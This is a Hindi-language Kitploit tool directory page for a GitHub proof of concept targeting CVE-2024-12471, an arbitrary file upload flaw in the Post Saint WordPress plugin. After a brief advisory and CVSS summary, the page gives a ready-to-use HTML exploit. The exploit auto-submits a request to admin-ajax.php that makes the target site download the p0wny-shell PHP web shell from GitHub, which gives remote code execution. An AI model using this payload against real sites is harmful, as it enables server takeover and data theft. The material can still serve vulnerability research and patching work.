Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-12471 — Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI टेक्स्ट और इमेज जनरेटर <= 1.3.1 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं हेतु प्राधिकरण की कमी से मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-12471
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-12471

CVE-2024-12471

Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI टेक्स्ट और इमेज जनरेटर <= 1.3.1 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं हेतु प्राधिकरण की कमी से मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-12471

Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - प्रमाणीकृत (सब्सक्राइबर+) उपयोगकर्ताओं के लिए प्राधिकरण की कमी से मनमाना फ़ाइल अपलोड

विवरण

WordPress के लिए Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator प्लगइन, 1.3.1 तक के सभी संस्करणों में, add_image_to_library AJAX एक्शन फ़ंक्शन पर क्षमता जाँच (capability check) और फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है। यह प्रमाणीकृत हमलावरों को, सब्सक्राइबर-स्तर और उससे ऊपर की पहुंच के साथ, मनमानी फ़ाइलें अपलोड करने में सक्षम बनाता है जिससे रिमोट कोड निष्पादन (remote code execution) संभव हो जाता है।

विवरण

  • प्रकार: plugin
  • स्लग: post-saint
  • प्रभावित संस्करण: 1.3.1
  • CVSS स्कोर: 8.8
  • CVSS रेटिंग: उच्च
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-12471
  • स्थिति: बंद

POC

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="add&#95;image&#95;to&#95;library" />
      <input type="hidden" name="image&#95;url" value="https&#58;&#47;&#47;raw&#46;githubusercontent&#46;com&#47;flozz&#47;p0wny&#45;shell&#47;refs&#47;heads&#47;master&#47;shell&#46;php" />
      <input type="hidden" name="image&#95;prompt" value="say&#32;hello" />
      <input type="hidden" name="insert&#95;prompt&#95;media&#95;library&#95;fields" value="caption&#95;description" />
      <input type="hidden" name="image&#95;generator" value="pexels" />
      <input type="hidden" name="log&#95;id" value="1667" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
टूल डाउनलोड करें